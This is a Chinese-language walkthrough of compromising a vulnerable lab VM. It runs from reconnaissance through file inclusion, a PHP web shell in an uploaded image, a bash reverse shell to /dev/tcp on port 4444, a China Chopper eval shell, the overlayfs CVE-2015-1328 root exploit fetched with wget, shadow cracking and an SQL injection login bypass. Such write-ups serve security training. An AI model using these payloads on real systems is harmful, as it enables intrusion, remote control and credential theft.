1、信息收集

1.1、获取IP地址：

map scan report for 192.168.118.137
Host is up (0.00017s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:69:99:DF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2、dirb目录爆破

root@kali:~# dirb "http://192.168.118.137" /usr/share/dirb/wordlists/big.txt -o  test.txt-----------------
DIRB v2.22
By The Dark Raver
-----------------OUTPUT_FILE: test.txt
START_TIME: Tue Nov 20 09:41:59 2018
URL_BASE: http://192.168.118.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt-----------------GENERATED WORDS: 20458                                                         ---- Scanning URL: http://192.168.118.137/ ----
+ http://192.168.118.137/add (CODE:200|SIZE:307)
+ http://192.168.118.137/c (CODE:200|SIZE:1)
+ http://192.168.118.137/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.118.137/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.118.137/images/
+ http://192.168.118.137/in (CODE:200|SIZE:47559)
+ http://192.168.118.137/index (CODE:200|SIZE:3267)
+ http://192.168.118.137/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.118.137/phpmy/
+ http://192.168.118.137/server-status (CODE:403|SIZE:296)
+ http://192.168.118.137/show (CODE:200|SIZE:1)
+ http://192.168.118.137/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.118.137/uploaded_images/                         ---- Entering directory: http://192.168.118.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/ ----
+ http://192.168.118.137/phpmy/ChangeLog (CODE:200|SIZE:28878)
+ http://192.168.118.137/phpmy/LICENSE (CODE:200|SIZE:18011)
+ http://192.168.118.137/phpmy/README (CODE:200|SIZE:2164)
+ http://192.168.118.137/phpmy/TODO (CODE:200|SIZE:190)
+ http://192.168.118.137/phpmy/changelog (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.118.137/phpmy/contrib/
+ http://192.168.118.137/phpmy/docs (CODE:200|SIZE:2781)
+ http://192.168.118.137/phpmy/export (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/favicon (CODE:200|SIZE:18902)
+ http://192.168.118.137/phpmy/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.118.137/phpmy/import (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/index (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.118.137/phpmy/js/
==> DIRECTORY: http://192.168.118.137/phpmy/libraries/
+ http://192.168.118.137/phpmy/license (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.118.137/phpmy/locale/
+ http://192.168.118.137/phpmy/main (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/navigation (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/phpinfo (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/phpmyadmin (CODE:200|SIZE:42380)
==> DIRECTORY: http://192.168.118.137/phpmy/pmd/
+ http://192.168.118.137/phpmy/print (CODE:200|SIZE:1064)
+ http://192.168.118.137/phpmy/robots (CODE:200|SIZE:26)
+ http://192.168.118.137/phpmy/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.118.137/phpmy/scripts/
==> DIRECTORY: http://192.168.118.137/phpmy/setup/
+ http://192.168.118.137/phpmy/sql (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.118.137/phpmy/themes/
+ http://192.168.118.137/phpmy/url (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/webapp (CODE:200|SIZE:6917)                     ---- Entering directory: http://192.168.118.137/uploaded_images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/contrib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/pmd/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/setup/ ----
+ http://192.168.118.137/phpmy/setup/config (CODE:303|SIZE:0)
==> DIRECTORY: http://192.168.118.137/phpmy/setup/frames/
+ http://192.168.118.137/phpmy/setup/index (CODE:200|SIZE:12971)
==> DIRECTORY: http://192.168.118.137/phpmy/setup/lib/
+ http://192.168.118.137/phpmy/setup/scripts (CODE:200|SIZE:5169)
+ http://192.168.118.137/phpmy/setup/styles (CODE:200|SIZE:6941)
+ http://192.168.118.137/phpmy/setup/validate (CODE:200|SIZE:10)               ---- Entering directory: http://192.168.118.137/phpmy/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.118.137/phpmy/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)-----------------
END_TIME: Tue Nov 20 09:42:34 2018
DOWNLOADED: 61374 - FOUND: 37

爆破出很多信息：

1、http://192.168.118.137/test

2、http://192.168.118.137/phpmy/phpinfo

3、http://192.168.118.137/phpmy/phpmyadmin

2、渗透测试

1、访问http://192.168.118.137/test 提示file参数：

2、GET测试不行，测试POST，发送POST有常用两种方式：

2.1、Hackbar

2.2、Burpsuite

Burpsuite-GET转换为POST:

Repeater-“charge request method”

3、测试出文件包含漏洞，用同样的方法下载爆破出来的其他文件

add.php、in.php、c.php、index.php、show.php、panel.php

代码审计c.php，发现mysql链接用户名、密码和链接的数据库：

$conn = mysqli_connect(“127.0.0.1″,”billu”,”b0x_billu”,”ica_lab”);

还可以获取的信息系统的用户名和密码：

file=/var/www/phpmy/config.inc.php
$cfg[‘Servers’][$i][‘user’] = ‘root’;
$cfg[‘Servers’][$i][‘password’] = ‘roottoor’

4、用http://192.168.118.137/phpmy/登录数据库

获取web登录的用户名和密码  biLLu：hEx_it

5、登录web查看web的功能：

show users

add user

有上传图片功能，测试是否能上传一句话木马

3、获取shell

notepad++ 图片加入一句话木马
<?php system($_GET[‘cmd’]); ?>

上传一个图片木马：

上传成功访问：

执行CMD命令：

include($dir.’/’.$_POST[‘load’]);   include可以执行.php文件

POST /panel.php?cmd=cat%20/etc/passwd;ls HTTP/1.1
Host: 192.168.118.137
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.118.137/panel.php
Cookie: PHPSESSID=fpbnovc9pc3rlg2sfeies9j1f7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48load=/uploaded_images/muma.jpg&continue=continue

执行反弹shell，需URL编码
echo “bash -i >& /dev/tcp/192.168.118.128/4444 0>&1” | bash

nc 反弹成功：

菜刀链接：
uploaded_images为写权限目录：
echo ‘<?php eval($_POST[‘123456′]);?>’ >> caidao.php

4、权限提升

提权到root：
www-data@indishell:/var/www$ cat /etc/issue
cat /etc/issue
Ubuntu 12.04.5 LTS \n \l

www-data@indishell:/var/www$ uname -a
uname -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
www-data@indishell:/var/www$

https://www.exploit-db.com/exploits/37292/
‘overlayfs’ Local Privilege Escalation-CVE-2015-1328

wget https://www.exploit-db.com/download/37292.c
chmod 777 37292.c
gcc 37292.c -o exp

Linux提取可以参考：

https://blog.csdn.net/qq_20307987/article/details/65443902

notepad：

根据系统版本号找对应exp

• http://www.exploit-db.com
• http://1337day.com
• http://www.securiteam.com
• http://www.securityfocus.com
• http://www.exploitsearch.net
• http://metasploit.com/modules
• http://securityreason.com
• http://seclists.org/fulldisclosure
• http://www.google.com

补充：

文件包含获取/etc/passwd和/etc/shadow 可以直接爆破root密码：

root@kali:~# unshadow passwd.txt shadow.txt >/tmp/unshadow.txt
root@kali:~# john --format=crypt  /tmp/unshadow.txt  --show
root:roottoor:0:0:root:/root:/bin/bash1 password hash cracked, 1 left

SQL注入：
test文件包含获得index.php
(1) 审计index.php源码，发现以下过滤规则：
$uname=str_replace(‘\”,”,urldecode($_POST[‘un’]));
$pass=str_replace(‘\”,”,urldecode($_POST[‘ps’]));
str_replace的作用是将字符串\’ 替换为空，

因此构造SQL注入登录payload时，必须含有\’字符串，否则会报错。
urldecode的作用是将输入解码。
(2) 常见的利用注入登录的payload是’ or 1=1 — 修改这个在最后增加\’，str_replace会将这个\’替换为空。
使用php在线调试工具，测试如下：
<?php
echo str_replace(‘\”,”,’ or 1=1 –\”);
?>
payload:’ or 1=1 — \’